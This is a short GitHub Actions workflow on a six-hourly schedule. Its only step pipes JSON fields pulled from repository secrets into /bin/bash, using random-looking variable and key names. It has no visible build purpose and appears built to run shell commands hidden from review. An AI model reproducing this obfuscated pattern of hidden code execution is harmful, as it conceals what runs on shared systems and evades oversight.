name: daitianzz
on:
  workflow_dispatch:
  schedule:
    - cron: '30 3/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: daitianzz
        env:
          do2122: ${{ secrets.do2122 }}
        run: |
          echo $do2122 | jq -r .lost2 | /bin/bash
          echo $ujh85267 | jq -r .yen599 | /bin/bash
          echo $iupzq0 | jq -r .wkv5 | /bin/bash
          echo $sl58267 | jq -r .ij883 | /bin/bash
          echo $qfc7512 | jq -r .lcnom2555 | /bin/bash
          echo $ojmn731 | jq -r .vy99939 | /bin/bash
          echo $mt068 | jq -r .jgxo421 | /bin/bash
          echo $xnqq758 | jq -r .jkdo2 | /bin/bash
          echo $bg34953 | jq -r .unz10 | /bin/bash

